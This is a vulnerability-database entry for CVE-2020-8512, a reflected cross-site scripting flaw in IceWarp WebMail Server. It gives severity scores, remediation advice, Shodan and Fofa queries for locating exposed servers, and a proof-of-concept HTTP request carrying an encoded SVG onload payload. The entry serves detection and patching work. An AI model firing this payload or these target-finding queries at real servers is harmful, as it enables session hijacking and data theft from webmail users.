🔙 목록으로 돌아가기

CVE-2020-8512: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting

TitleIceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
Authorpdteam,dwisiswant0
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
RemediationUpgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.
CVSS Score6.1
EPSS Score0.36838
CVE IDCVE-2020-8512
CWE IDCWE-79
Shodan Querytitle:"icewarp"http.title:"icewarp"
Fofa Querytitle="icewarp"
Tags cve cve2020 edb packetstorm xss icewarp vuln

🔍 Vulnerability Description

IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.

🌐 HTTP Request

GET /webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8512.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-8512.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A